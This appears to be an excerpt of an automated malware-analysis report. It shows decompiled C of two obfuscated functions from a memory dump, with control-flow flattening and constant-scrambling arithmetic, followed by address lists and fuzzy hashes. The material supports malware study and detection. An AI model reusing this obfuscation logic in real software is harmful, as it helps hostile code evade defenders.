                                                                                                                                                                                                                    				signed int _t173;
                                                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                                                    				signed int _t175;
                                                                                                                                                                                                                    				void* _t201;
                                                                                                                                                                                                                    				void* _t202;
                                                                                                                                                                                                                    				signed int* _t205;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t205 =  &_v64;
                                                                                                                                                                                                                    				_v48 = 0xc37941;
                                                                                                                                                                                                                    				_v48 = _v48 >> 0xf;
                                                                                                                                                                                                                    				_v48 = _v48 >> 3;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x000496a7;
                                                                                                                                                                                                                    				_v12 = 0x9aaa37;
                                                                                                                                                                                                                    				_t201 = __edx;
                                                                                                                                                                                                                    				_t170 = __ecx;
                                                                                                                                                                                                                    				_t202 = 0x494d32e;
                                                                                                                                                                                                                    				_t172 = 0x6c;
                                                                                                                                                                                                                    				_v12 = _v12 / _t172;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x000c789f;
                                                                                                                                                                                                                    				_v60 = 0x25ab48;
                                                                                                                                                                                                                    				_v60 = _v60 * 0x3f;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xffffd49f;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0xe8927484;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0xe1dc426f;
                                                                                                                                                                                                                    				_v40 = 0x12eaa5;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xdaf2916f;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffffb7c3;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xdae543e1;
                                                                                                                                                                                                                    				_v44 = 0xc7d26c;
                                                                                                                                                                                                                    				_v44 = _v44 | 0x2287c440;
                                                                                                                                                                                                                    				_v44 = _v44 * 0x52;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x2405458e;
                                                                                                                                                                                                                    				_v36 = 0xa632fd;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffff4c69;
                                                                                                                                                                                                                    				_v36 = _v36 << 9;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x4afab55a;
                                                                                                                                                                                                                    				_v8 = 0xece78c;
                                                                                                                                                                                                                    				_v8 = _v8 + 0x9b1b;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x00e63dae;
                                                                                                                                                                                                                    				_v28 = 0xcc64ce;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xffff7cb6;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00cab83f;
                                                                                                                                                                                                                    				_v32 = 0x3a8eb1;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x29ed;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0034d825;
                                                                                                                                                                                                                    				_v64 = 0x37cdd5;
                                                                                                                                                                                                                    				_v64 = _v64 / _t172;
                                                                                                                                                                                                                    				_v64 = _v64 << 5;
                                                                                                                                                                                                                    				_v64 = _v64 | 0xfe532437;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0xfe546db7;
                                                                                                                                                                                                                    				_v16 = 0xbaf4a2;
                                                                                                                                                                                                                    				_t173 = 0x17;
                                                                                                                                                                                                                    				_v16 = _v16 / _t173;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x00015cc4;
                                                                                                                                                                                                                    				_v20 = 0x6d4303;
                                                                                                                                                                                                                    				_v20 = _v20 >> 0xd;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0001f48a;
                                                                                                                                                                                                                    				_v24 = 0x35994e;
                                                                                                                                                                                                                    				_v24 = _v24 >> 0xf;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0002c2d0;
                                                                                                                                                                                                                    				_v52 = 0x31f3f5;
                                                                                                                                                                                                                    				_v52 = _v52 | 0xa4b7ead2;
                                                                                                                                                                                                                    				_t174 = 0x72;
                                                                                                                                                                                                                    				_v52 = _v52 / _t174;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0176ac2d;
                                                                                                                                                                                                                    				_v56 = 0x8dc0db;
                                                                                                                                                                                                                    				_t175 = 0x55;
                                                                                                                                                                                                                    				_v56 = _v56 / _t175;
                                                                                                                                                                                                                    				_t176 = 0x70;
                                                                                                                                                                                                                    				_v56 = _v56 / _t176;
                                                                                                                                                                                                                    				_v56 = _v56 + 0x91a8;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x00030a04;
                                                                                                                                                                                                                    				_v4 = 0xab5a8;
                                                                                                                                                                                                                    				_v4 = _v4 << 0xb;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x55aaf6ce;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t163 = 0x6e7613a;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						while(_t202 != 0x1ecd27c) {
                                                                                                                                                                                                                    							if(_t202 == 0x494d32e) {
                                                                                                                                                                                                                    								_t202 = 0x1ecd27c;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t202 == 0x6cc417f) {
                                                                                                                                                                                                                    								return E00A74013(_v56, _v4,  *(_t201 + 0x2c));
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t202 != _t163) {
                                                                                                                                                                                                                    								if(_t202 != 0xbae7233) {
                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t176 = _v28;
                                                                                                                                                                                                                    									_t167 = E00A68F8F(_v28, _v32,  *(_t201 + 0x2c));
                                                                                                                                                                                                                    									_t205 =  &(_t205[1]);
                                                                                                                                                                                                                    									 *((intOrPtr*)(_t201 + 0x18)) = _t167;
                                                                                                                                                                                                                    									_t163 = 0x6e7613a;
                                                                                                                                                                                                                    									_t202 =  !=  ? 0x6e7613a : 0x6cc417f;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t166 = E00A646D0(_v64, _t176, _t201, _v16, _v20, _v24, _t176, _v52, _t176, E00A6F346);
                                                                                                                                                                                                                    							_t205 =  &(_t205[9]);
                                                                                                                                                                                                                    							 *(_t201 + 4) = _t166;
                                                                                                                                                                                                                    							__eflags = _t166;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								_t202 = 0x6cc417f;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									L1:
                                                                                                                                                                                                                    									_t163 = 0x6e7613a;
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							return _t166;
                                                                                                                                                                                                                    							L18:
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t164 = E00A7B2B8(_v48, _v12, __eflags, _t176);
                                                                                                                                                                                                                    						 *(_t201 + 0x2c) = _t164;
                                                                                                                                                                                                                    						_t176 = _t170;
                                                                                                                                                                                                                    						__eflags = _t164;
                                                                                                                                                                                                                    						if(_t164 == 0) {
                                                                                                                                                                                                                    							_t202 = 0x24deba3;
                                                                                                                                                                                                                    							_t163 = 0x6e7613a;
                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							E00A797C3(_v60, _t164, _t164, _v40, _v44);
                                                                                                                                                                                                                    							_push(_v8);
                                                                                                                                                                                                                    							_t176 =  *(_t201 + 0x2c);
                                                                                                                                                                                                                    							E00A6FDE3( *(_t201 + 0x2c), _v36);
                                                                                                                                                                                                                    							_t205 =  &(_t205[4]);
                                                                                                                                                                                                                    							_t202 = 0xbae7233;
                                                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                    						__eflags = _t202 - 0x24deba3;
                                                                                                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                                                                                                    					return _t163;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                    0x00a7ac3d
                                                                                                                                                                                                                    0x00a7ac40
                                                                                                                                                                                                                    0x00a7ac48
                                                                                                                                                                                                                    0x00a7ac4d
                                                                                                                                                                                                                    0x00a7ac52
                                                                                                                                                                                                                    0x00a7ac5a
                                                                                                                                                                                                                    0x00a7ac6a
                                                                                                                                                                                                                    0x00a7ac6c
                                                                                                                                                                                                                    0x00a7ac70
                                                                                                                                                                                                                    0x00a7ac77
                                                                                                                                                                                                                    0x00a7ac7c
                                                                                                                                                                                                                    0x00a7ac80
                                                                                                                                                                                                                    0x00a7ac88
                                                                                                                                                                                                                    0x00a7ac97
                                                                                                                                                                                                                    0x00a7ac9b
                                                                                                                                                                                                                    0x00a7aca3
                                                                                                                                                                                                                    0x00a7acab
                                                                                                                                                                                                                    0x00a7acb3
                                                                                                                                                                                                                    0x00a7acbb
                                                                                                                                                                                                                    0x00a7acc3
                                                                                                                                                                                                                    0x00a7accb
                                                                                                                                                                                                                    0x00a7acd3
                                                                                                                                                                                                                    0x00a7acdb
                                                                                                                                                                                                                    0x00a7ace8
                                                                                                                                                                                                                    0x00a7acec
                                                                                                                                                                                                                    0x00a7acf4
                                                                                                                                                                                                                    0x00a7acfc
                                                                                                                                                                                                                    0x00a7ad04
                                                                                                                                                                                                                    0x00a7ad09
                                                                                                                                                                                                                    0x00a7ad11
                                                                                                                                                                                                                    0x00a7ad19
                                                                                                                                                                                                                    0x00a7ad21
                                                                                                                                                                                                                    0x00a7ad29
                                                                                                                                                                                                                    0x00a7ad31
                                                                                                                                                                                                                    0x00a7ad39
                                                                                                                                                                                                                    0x00a7ad41
                                                                                                                                                                                                                    0x00a7ad49
                                                                                                                                                                                                                    0x00a7ad51
                                                                                                                                                                                                                    0x00a7ad59
                                                                                                                                                                                                                    0x00a7ad69
                                                                                                                                                                                                                    0x00a7ad6d
                                                                                                                                                                                                                    0x00a7ad72
                                                                                                                                                                                                                    0x00a7ad7a
                                                                                                                                                                                                                    0x00a7ad82
                                                                                                                                                                                                                    0x00a7ad8e
                                                                                                                                                                                                                    0x00a7ad93
                                                                                                                                                                                                                    0x00a7ad99
                                                                                                                                                                                                                    0x00a7ada1
                                                                                                                                                                                                                    0x00a7ada9
                                                                                                                                                                                                                    0x00a7adae
                                                                                                                                                                                                                    0x00a7adb6
                                                                                                                                                                                                                    0x00a7adbe
                                                                                                                                                                                                                    0x00a7adc3
                                                                                                                                                                                                                    0x00a7adcb
                                                                                                                                                                                                                    0x00a7add3
                                                                                                                                                                                                                    0x00a7addf
                                                                                                                                                                                                                    0x00a7ade2
                                                                                                                                                                                                                    0x00a7ade6
                                                                                                                                                                                                                    0x00a7adf0
                                                                                                                                                                                                                    0x00a7adfe
                                                                                                                                                                                                                    0x00a7ae03
                                                                                                                                                                                                                    0x00a7ae12
                                                                                                                                                                                                                    0x00a7ae15
                                                                                                                                                                                                                    0x00a7ae19
                                                                                                                                                                                                                    0x00a7ae21
                                                                                                                                                                                                                    0x00a7ae29
                                                                                                                                                                                                                    0x00a7ae31
                                                                                                                                                                                                                    0x00a7ae36
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00a7ae43
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7ae43
                                                                                                                                                                                                                    0x00a7ae55
                                                                                                                                                                                                                    0x00a7aeca
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7aeca
                                                                                                                                                                                                                    0x00a7ae59
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7af45
                                                                                                                                                                                                                    0x00a7ae61
                                                                                                                                                                                                                    0x00a7ae69
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7ae6f
                                                                                                                                                                                                                    0x00a7ae76
                                                                                                                                                                                                                    0x00a7ae7a
                                                                                                                                                                                                                    0x00a7ae7f
                                                                                                                                                                                                                    0x00a7ae82
                                                                                                                                                                                                                    0x00a7ae89
                                                                                                                                                                                                                    0x00a7ae8e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7ae8e
                                                                                                                                                                                                                    0x00a7ae69
                                                                                                                                                                                                                    0x00a7aeb0
                                                                                                                                                                                                                    0x00a7aeb5
                                                                                                                                                                                                                    0x00a7aeb8
                                                                                                                                                                                                                    0x00a7aebb
                                                                                                                                                                                                                    0x00a7aebd
                                                                                                                                                                                                                    0x00a7aec3
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00a7ae3e
                                                                                                                                                                                                                    0x00a7af4d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7af4d
                                                                                                                                                                                                                    0x00a7aede
                                                                                                                                                                                                                    0x00a7aee3
                                                                                                                                                                                                                    0x00a7aee7
                                                                                                                                                                                                                    0x00a7aee8
                                                                                                                                                                                                                    0x00a7aeea
                                                                                                                                                                                                                    0x00a7af1d
                                                                                                                                                                                                                    0x00a7af22
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7aeec
                                                                                                                                                                                                                    0x00a7aefb
                                                                                                                                                                                                                    0x00a7af00
                                                                                                                                                                                                                    0x00a7af08
                                                                                                                                                                                                                    0x00a7af0b
                                                                                                                                                                                                                    0x00a7af10
                                                                                                                                                                                                                    0x00a7af13
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7af13
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7af27
                                                                                                                                                                                                                    0x00a7af27
                                                                                                                                                                                                                    0x00a7af27
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7ae43

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )
                                                                                                                                                                                                                    • API String ID: 0-1921220550
                                                                                                                                                                                                                    • Opcode ID: 731973d19d4f8deff41ee8c9da250e091c456744ec760b4bb6dfcac92d4c5b86
                                                                                                                                                                                                                    • Instruction ID: 266cb7c4267ac02adaed28a5d5105635b2d9478bbcfcaa8ce4ba7fb60c36acdb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731973d19d4f8deff41ee8c9da250e091c456744ec760b4bb6dfcac92d4c5b86
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 157135B2908302AFC758CF25D98980BFBF1ABD4758F108A1DF59996260D7B1D9198F83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A735DB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                    				void* _t189;
                                                                                                                                                                                                                    				signed int _t192;
                                                                                                                                                                                                                    				signed int _t193;
                                                                                                                                                                                                                    				signed int _t194;
                                                                                                                                                                                                                    				signed int _t195;
                                                                                                                                                                                                                    				void* _t198;
                                                                                                                                                                                                                    				void* _t215;
                                                                                                                                                                                                                    				void* _t216;
                                                                                                                                                                                                                    				signed int* _t219;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_t215 = __ecx;
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t165);
                                                                                                                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                                                                                                                    				_t219 =  &(( &_v76)[6]);
                                                                                                                                                                                                                    				_v8 = 0xc40725;
                                                                                                                                                                                                                    				_v64 = 0x71cc03;
                                                                                                                                                                                                                    				_t216 = 0;
                                                                                                                                                                                                                    				_t198 = 0x469cc8e;
                                                                                                                                                                                                                    				_t192 = 0x45;
                                                                                                                                                                                                                    				_v64 = _v64 / _t192;
                                                                                                                                                                                                                    				_v64 = _v64 >> 4;
                                                                                                                                                                                                                    				_v64 = _v64 << 4;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x0001a631;
                                                                                                                                                                                                                    				_v44 = 0x2d16d1;
                                                                                                                                                                                                                    				_t193 = 0x15;
                                                                                                                                                                                                                    				_v44 = _v44 * 0x1a;
                                                                                                                                                                                                                    				_v44 = _v44 | 0x8b06add1;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xfd11;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x8f97fb0d;
                                                                                                                                                                                                                    				_v28 = 0x8a1b2d;
                                                                                                                                                                                                                    				_v28 = _v28 << 7;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x050d9680;
                                                                                                                                                                                                                    				_v48 = 0xa35582;
                                                                                                                                                                                                                    				_v48 = _v48 | 0x184f9688;
                                                                                                                                                                                                                    				_v48 = _v48 * 0x75;
                                                                                                                                                                                                                    				_v48 = _v48 * 0x1a;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x11ff35d4;
                                                                                                                                                                                                                    				_v32 = 0x3c71f5;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x6a;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x19089bea;
                                                                                                                                                                                                                    				_v68 = 0xc7027b;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff6c4f;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x258e9026;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff2bee;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x25c9269a;
                                                                                                                                                                                                                    				_v72 = 0x6ec410;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x34;
                                                                                                                                                                                                                    				_v72 = _v72 + 0x8a75;
                                                                                                                                                                                                                    				_v72 = _v72 << 9;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x00b5d60f;
                                                                                                                                                                                                                    				_v76 = 0xb2dc5a;
                                                                                                                                                                                                                    				_v76 = _v76 | 0xc78f6807;
                                                                                                                                                                                                                    				_v76 = _v76 + 0x4705;
                                                                                                                                                                                                                    				_v76 = _v76 / _t193;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x09848125;
                                                                                                                                                                                                                    				_v40 = 0x7cfe1c;
                                                                                                                                                                                                                    				_t194 = 0x2a;
                                                                                                                                                                                                                    				_v40 = _v40 / _t194;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffff6ba2;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x00090a43;
                                                                                                                                                                                                                    				_v36 = 0xeb1650;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffff5f2a;
                                                                                                                                                                                                                    				_v36 = _v36 * 0x56;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x4ec48f56;
                                                                                                                                                                                                                    				_v24 = 0xb8d826;
                                                                                                                                                                                                                    				_t195 = 0x42;
                                                                                                                                                                                                                    				_v24 = _v24 / _t195;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0006ba00;
                                                                                                                                                                                                                    				_v52 = 0x6fdcdd;
                                                                                                                                                                                                                    				_v52 = _v52 << 0xc;
                                                                                                                                                                                                                    				_v52 = _v52 | 0xd409f175;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x98ecd3a6;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x6528ad53;
                                                                                                                                                                                                                    				_v16 = 0xfc5b13;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffffa3da;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x00f782c1;
                                                                                                                                                                                                                    				_v20 = 0x51cfc1;
                                                                                                                                                                                                                    				_v20 = _v20 * 0x2a;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0d647319;
                                                                                                                                                                                                                    				_v56 = 0xe4dfd0;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x32c7138b;
                                                                                                                                                                                                                    				_v56 = _v56 << 3;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xffffb9d9;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x9114c374;
                                                                                                                                                                                                                    				_v60 = 0x655f94;
                                                                                                                                                                                                                    				_v60 = _v60 | 0x66f8e2c3;
                                                                                                                                                                                                                    				_v60 = _v60 << 7;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x4d32d19e;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x33c06c0b;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t198 != 0x469cc8e) {
                                                                                                                                                                                                                    						if(_t198 == 0x9738908) {
                                                                                                                                                                                                                    							_t216 = E00A7C6D9(_v12 + _v12);
                                                                                                                                                                                                                    							if(_t216 != 0) {
                                                                                                                                                                                                                    								_t198 = 0xc00be78;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t198 == 0xa6347ab) {
                                                                                                                                                                                                                    								_t189 = E00A74B38(_v28 | _v64, _a8, 0, _v32, _v68, _v72,  &_v12, _v76, _t215, _v40);
                                                                                                                                                                                                                    								_t219 =  &(_t219[8]);
                                                                                                                                                                                                                    								if(_t189 != 0) {
                                                                                                                                                                                                                    									_t198 = 0x9738908;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t198 != 0xc00be78) {
                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									E00A74B38(_v48 | _v44, _a8, _t216, _v52, _v16, _v20,  &_v12, _v56, _t215, _v60);
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                    						return _t216;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t198 = 0xa6347ab;
                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                    				} while (_t198 != 0x455641e);
                                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                                    			}
































                                                                                                                                                                                                                    0x00a735e2
                                                                                                                                                                                                                    0x00a735e6
                                                                                                                                                                                                                    0x00a735e8
                                                                                                                                                                                                                    0x00a735ec
                                                                                                                                                                                                                    0x00a735f0
                                                                                                                                                                                                                    0x00a735f4
                                                                                                                                                                                                                    0x00a735f5
                                                                                                                                                                                                                    0x00a735f6
                                                                                                                                                                                                                    0x00a735fb
                                                                                                                                                                                                                    0x00a73600
                                                                                                                                                                                                                    0x00a73603
                                                                                                                                                                                                                    0x00a7360d
                                                                                                                                                                                                                    0x00a73615
                                                                                                                                                                                                                    0x00a7361b
                                                                                                                                                                                                                    0x00a73622
                                                                                                                                                                                                                    0x00a73627
                                                                                                                                                                                                                    0x00a7362d
                                                                                                                                                                                                                    0x00a73632
                                                                                                                                                                                                                    0x00a73637
                                                                                                                                                                                                                    0x00a7363f
                                                                                                                                                                                                                    0x00a7364c
                                                                                                                                                                                                                    0x00a7364f
                                                                                                                                                                                                                    0x00a73653
                                                                                                                                                                                                                    0x00a7365b
                                                                                                                                                                                                                    0x00a73663
                                                                                                                                                                                                                    0x00a7366b
                                                                                                                                                                                                                    0x00a73673
                                                                                                                                                                                                                    0x00a73678
                                                                                                                                                                                                                    0x00a73680
                                                                                                                                                                                                                    0x00a73688
                                                                                                                                                                                                                    0x00a73695
                                                                                                                                                                                                                    0x00a7369e
                                                                                                                                                                                                                    0x00a736a2
                                                                                                                                                                                                                    0x00a736aa
                                                                                                                                                                                                                    0x00a736b7
                                                                                                                                                                                                                    0x00a736bb
                                                                                                                                                                                                                    0x00a736c3
                                                                                                                                                                                                                    0x00a736cb
                                                                                                                                                                                                                    0x00a736d3
                                                                                                                                                                                                                    0x00a736db
                                                                                                                                                                                                                    0x00a736e3
                                                                                                                                                                                                                    0x00a736eb
                                                                                                                                                                                                                    0x00a736f8
                                                                                                                                                                                                                    0x00a736fc
                                                                                                                                                                                                                    0x00a73704
                                                                                                                                                                                                                    0x00a73709
                                                                                                                                                                                                                    0x00a73711
                                                                                                                                                                                                                    0x00a73719
                                                                                                                                                                                                                    0x00a73721
                                                                                                                                                                                                                    0x00a73731
                                                                                                                                                                                                                    0x00a73735
                                                                                                                                                                                                                    0x00a7373d
                                                                                                                                                                                                                    0x00a73749
                                                                                                                                                                                                                    0x00a7374c
                                                                                                                                                                                                                    0x00a73750
                                                                                                                                                                                                                    0x00a73758
                                                                                                                                                                                                                    0x00a73760
                                                                                                                                                                                                                    0x00a73768
                                                                                                                                                                                                                    0x00a73775
                                                                                                                                                                                                                    0x00a73779
                                                                                                                                                                                                                    0x00a73783
                                                                                                                                                                                                                    0x00a73796
                                                                                                                                                                                                                    0x00a7379e
                                                                                                                                                                                                                    0x00a737a2
                                                                                                                                                                                                                    0x00a737aa
                                                                                                                                                                                                                    0x00a737b2
                                                                                                                                                                                                                    0x00a737b7
                                                                                                                                                                                                                    0x00a737bf
                                                                                                                                                                                                                    0x00a737c7
                                                                                                                                                                                                                    0x00a737cf
                                                                                                                                                                                                                    0x00a737d7
                                                                                                                                                                                                                    0x00a737df
                                                                                                                                                                                                                    0x00a737e7
                                                                                                                                                                                                                    0x00a737f4
                                                                                                                                                                                                                    0x00a737f8
                                                                                                                                                                                                                    0x00a73800
                                                                                                                                                                                                                    0x00a73808
                                                                                                                                                                                                                    0x00a73810
                                                                                                                                                                                                                    0x00a73815
                                                                                                                                                                                                                    0x00a7381d
                                                                                                                                                                                                                    0x00a73825
                                                                                                                                                                                                                    0x00a7382d
                                                                                                                                                                                                                    0x00a73835
                                                                                                                                                                                                                    0x00a7383a
                                                                                                                                                                                                                    0x00a73842
                                                                                                                                                                                                                    0x00a7384a
                                                                                                                                                                                                                    0x00a7384a
                                                                                                                                                                                                                    0x00a73858
                                                                                                                                                                                                                    0x00a738f6
                                                                                                                                                                                                                    0x00a738fb
                                                                                                                                                                                                                    0x00a738fd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a738fd
                                                                                                                                                                                                                    0x00a7385e
                                                                                                                                                                                                                    0x00a73860
                                                                                                                                                                                                                    0x00a738cf
                                                                                                                                                                                                                    0x00a738d4
                                                                                                                                                                                                                    0x00a738d9
                                                                                                                                                                                                                    0x00a738db
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a738db
                                                                                                                                                                                                                    0x00a73862
                                                                                                                                                                                                                    0x00a73868
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7386e
                                                                                                                                                                                                                    0x00a73895
                                                                                                                                                                                                                    0x00a7389a
                                                                                                                                                                                                                    0x00a73868
                                                                                                                                                                                                                    0x00a73860
                                                                                                                                                                                                                    0x00a7389e
                                                                                                                                                                                                                    0x00a738a6
                                                                                                                                                                                                                    0x00a738a6
                                                                                                                                                                                                                    0x00a73907
                                                                                                                                                                                                                    0x00a73909
                                                                                                                                                                                                                    0x00a73909
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                                                    • API String ID: 0-246332069
                                                                                                                                                                                                                    • Opcode ID: dd4e608e9b517c93951c703c4b126ed216b9104c5dddb63813f1b6c63d735a4c
                                                                                                                                                                                                                    • Instruction ID: 5750dae2e5ccfab144aa3be73a6a2101d16cc85d1a6dea91d3b85cd5d2caa7f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd4e608e9b517c93951c703c4b126ed216b9104c5dddb63813f1b6c63d735a4c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32813FB2509341ABC754CF65C98991BFBF1FBC8758F40990DF28A96260D7B1CA09CB43
                                                                                                                                                                                                                    Uniqueness

